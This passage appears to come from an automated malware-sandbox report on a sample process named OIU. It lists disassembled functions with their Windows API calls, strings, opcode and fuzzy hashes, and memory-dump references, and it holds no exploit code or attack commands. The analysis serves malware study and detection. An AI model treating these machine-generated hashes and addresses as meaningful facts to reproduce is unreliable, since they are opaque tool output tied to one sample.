                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID: y7HR
                                                                      • API String ID: 4210589936-2878486218
                                                                      • Opcode ID: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                                      • Instruction ID: d52a739c84363192753db4955e1c1177b5bef627ae30259f41406995928ef0b8
                                                                      • Opcode Fuzzy Hash: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                                      • Instruction Fuzzy Hash: 33415F7190850AFBDF159F68C884BFEB7B4FF05320F208299E525B7290CB745A58EB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00BC2D4B
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC2D53
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00BC2DE1
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC2E0C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00BC2E61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                                      • Instruction ID: f52b273df9e2acf505804c6209f24529f4e5c1611d653f36f83759c0509e1e7b
                                                                      • Opcode Fuzzy Hash: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                                      • Instruction Fuzzy Hash: F4418334A00209ABCF10DF68C885F9EBBF5FF55324F1481A9E915AB392D7319A15CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                                        • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C21112
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21121
                                                                      • WSAGetLastError.WSOCK32 ref: 00C211C9
                                                                      • closesocket.WSOCK32(00000000), ref: 00C211F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 2675159561-0
                                                                      • Opcode ID: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                                      • Instruction ID: 2f9dd9b1200aba4491b78a510259f9bb4d02dfdaaf36b1b35eed8ce29055ba87
                                                                      • Opcode Fuzzy Hash: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                                      • Instruction Fuzzy Hash: CB41F631600214AFDB109F24D885BAEBBE9FF55324F188059FD15AB292C774EE45CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C0CF45
                                                                      • MoveFileW.KERNEL32 ref: 00C0CF7F
                                                                      • _wcslen.LIBCMT ref: 00C0D005
                                                                      • _wcslen.LIBCMT ref: 00C0D01B
                                                                      • SHFileOperationW.SHELL32(?), ref: 00C0D061
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
                                                                      • Opcode ID: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                                      • Instruction ID: c0dc893c3ae368f78847436c9c738578bf6e83e16137ccb8cc12c7ad33939441
                                                                      • Opcode Fuzzy Hash: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                                      • Instruction Fuzzy Hash: 0C4135B19452195EDF12EBA4D9C1FDEB7F9AF48380F1000E6E505EB182EB34A784DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C32DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C32E1C
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E4F
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E84
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C32EB6
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C32EE0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32EF1
                                                                      • SetWindowLongW.USER32 ref: 00C32F0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                                      • Instruction ID: 3008aa586455a5e060c4d8c1ffc6e6fa1c3fa9f33e165d452efcf345e3627e39
                                                                      • Opcode Fuzzy Hash: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                                      • Instruction Fuzzy Hash: 9F311331614250AFDF20CF58DC86F6937E0EB8AB21F180164FA149B2B1CB71AD80DB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C07726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07769
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0778F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C07792
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C077B0
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C077B9
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C077DE
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C077EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 17e669798f938508394cd40b7d41f67695f38bc3922491c374f0fdfcebc54d79
                                                                      • Instruction ID: 8199827e888421cfbbdcfd2fc5d3970d44f1149c83da1c65fbf11d1c9f4fc373
                                                                      • Opcode Fuzzy Hash: 17e669798f938508394cd40b7d41f67695f38bc3922491c374f0fdfcebc54d79
                                                                      • Instruction Fuzzy Hash: 7421AE76A04219AFDB15DFACCC88EBF73ACEB093A4B008125BA14DB190D670ED41C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07842
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07868
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C0786B
                                                                      • SysAllocString.OLEAUT32 ref: 00C0788C
                                                                      • SysFreeString.OLEAUT32 ref: 00C07895
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C078AF
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C078BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 3010b2b3fb041219a69b9aa593a82c32573e6bbb45727fa50984a482ab441b0f
                                                                      • Instruction ID: aa6755d6097050df353d4b6701c2d92bf05519e9c5302b28a692278ddb49ea9c
                                                                      • Opcode Fuzzy Hash: 3010b2b3fb041219a69b9aa593a82c32573e6bbb45727fa50984a482ab441b0f
                                                                      • Instruction Fuzzy Hash: A1216531A04104AFDB149FA8DC88EBE77ECEB097607108225F915EB1E1D674ED41CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00C104F2
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C1052E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                                      • Instruction ID: 80a5222020c3133c1601a7292bfcd3f0dcbdb77f9abc480eb8e0bcba8ff9a4d1
                                                                      • Opcode Fuzzy Hash: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                                      • Instruction Fuzzy Hash: 4D218D71500305ABDB209F69DC44BDE7BA5AF46724F304A19F8B1E62E0D7B09AD0EF24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C10601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                                      • Instruction ID: d7539e10c1fd4fdf51b144be98a7c6b429aba0e8b2936a8e3195187c000a1c45
                                                                      • Opcode Fuzzy Hash: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                                      • Instruction Fuzzy Hash: 7E216D755002059BDB209F698844ADAB7A4AF96721F300A19FCB1E72E0D7F099E1EB20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA600E: CreateWindowExW.USER32 ref: 00BA604C
                                                                        • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                                        • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C34112
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C3411F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C3412A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C34139
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C34145
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                                      • Instruction ID: 5ae09410ef85ca364b13b2fcf030644da3ab5280a34847754e05563a19f9407a
                                                                      • Opcode Fuzzy Hash: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                                      • Instruction Fuzzy Hash: F31186B21502197EEF219F64CC86EEB7F6DEF09798F014111FA18A6150C6729C61DBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BDD7A3: _free.LIBCMT ref: 00BDD7CC
                                                                      • _free.LIBCMT ref: 00BDD82D
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDD838
                                                                      • _free.LIBCMT ref: 00BDD843
                                                                      • _free.LIBCMT ref: 00BDD897
                                                                      • _free.LIBCMT ref: 00BDD8A2
                                                                      • _free.LIBCMT ref: 00BDD8AD
                                                                      • _free.LIBCMT ref: 00BDD8B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                      • Instruction ID: 7926a27bced7d7195f17d718900636a4fcc0fe919417e64c5f9b7be8ba976f39
                                                                      • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                      • Instruction Fuzzy Hash: 30115E71540B44AAD621BFB0CC47FCBFBDCAF10700F4008A6B2DDA6392EA69B9059664
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0DA74
                                                                      • LoadStringW.USER32(00000000), ref: 00C0DA7B
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0DA91
                                                                      • LoadStringW.USER32(00000000), ref: 00C0DA98
                                                                      • MessageBoxW.USER32 ref: 00C0DADC
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00C0DAB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4072794657-3128320259
                                                                      • Opcode ID: 9824ee5a4b8d64f63f5d35f4141c42be7d8af0079147c7124b7960f44fda7137
                                                                      • Instruction ID: 5f401959d2b8c87e6442253851494ce23eb4e99d25b784e7c98cc4332fdf4d06
                                                                      • Opcode Fuzzy Hash: 9824ee5a4b8d64f63f5d35f4141c42be7d8af0079147c7124b7960f44fda7137
                                                                      • Instruction Fuzzy Hash: AA0162F25102087FEB109BA09DC9FEF326CE708701F400495B706F2081EA749E848F74
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(00EAA3A0,00EAA3A0), ref: 00C1097B
                                                                      • EnterCriticalSection.KERNEL32(00EAA380,00000000), ref: 00C1098D
                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C1099B
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C109A9
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C109B8
                                                                      • InterlockedExchange.KERNEL32(00EAA3A0,000001F6), ref: 00C109C8
                                                                      • LeaveCriticalSection.KERNEL32(00EAA380), ref: 00C109CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: f1337b27275384198cef7c1f2ebc19f77de35ab3648c5044725832cf83906070
                                                                      • Instruction ID: 8afe808afceb5fc8e97a58358b9cf6618e67e52ea690b9427150090edf106fad
                                                                      • Opcode Fuzzy Hash: f1337b27275384198cef7c1f2ebc19f77de35ab3648c5044725832cf83906070
                                                                      • Instruction Fuzzy Hash: 78F0C932452A12ABD7515BA4EEC9BDEBA29BF05702F502025F202A08A1C7B595B5DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 00BD00BA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD00D6
                                                                      • __allrem.LIBCMT ref: 00BD00ED
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD010B
                                                                      • __allrem.LIBCMT ref: 00BD0122
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD0140
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
